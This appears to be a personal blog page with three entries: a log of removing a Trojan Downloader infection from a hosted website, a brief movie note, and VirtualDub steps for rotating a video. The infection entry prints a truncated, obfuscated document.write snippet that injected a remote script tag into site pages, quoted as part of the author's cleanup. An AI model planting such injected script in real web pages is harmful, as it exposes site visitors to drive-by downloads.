小新二三事 二三事 電視精/戲院 ASP .NET 新手工作日誌


trojan horse, virus report: Trojan Downloader JS Pegel d

trojan horse, virus report: Trojan Downloader JS Pegel d

no information from this link

strange javascript were inserted to index.html, index.php, main.html, main.php, *.js
in webhosting server

after check
strange javascript will run in IE, Firefox
to make an iframe
to download a pdf "ChangeLog.pdf"
from ru website


after I found the strange code
update antivirus, pdf reader, broswer

steps of my solution :
1. download files back to PC
2. files got deleted when antivirus activated
3. disable antivirus then download files
(zip a copy)
4. manual delete javascript code for 10 files.
5. use notepad+ to search and replace javascript
6. enable antivirus then upload files

2 types of javascript to search and replace
type 1
/*Exception*/ document.write('<script src='+'h&amp;t()$#t(p!(:!^</b>...<b>\!|\^|&amp;/ig, '')+' defer=defer></scr'+'ipt>');
type 2
/*Exception*/ document.write('<script src='+'h&amp;t()$#t(p!(:!^</b>...<b>\!|\^|&amp;/ig, '')+' defer=defer></scr'+'ipt>');

hour to update and clear all files for 1 domain
total 8:

so bad luck


2010-01-09 半夜 真心話

2010-01-09 半夜 真心話

老土, 但係幾好睇

電影真心話(TRUTH ABOUT JANE & SAM),是由範文芳、何潤東主演,爾冬陞編導。這是一齣愛情片,講述一對男女生活與成長環境懸殊,從邂逅、相戀的經歷,最終兩人一起步向陽光。

Rotate video for 90 degree in PC

Rotate video for 90 degree in PC
1. http://www.virtualdub.org
2. download virtualdub newest version
3. run
4. File->open-> 你個 avi
5. Video->Filters->Add... "Rotate", set your desired angle
6. Set video compression
(MUST DO !!! otherwise you will get a UNCOMPRESSED MICROSOFT AVI, which is 2GB for only 5 minutes!)
7. Set Audio
8. File->Save As avi file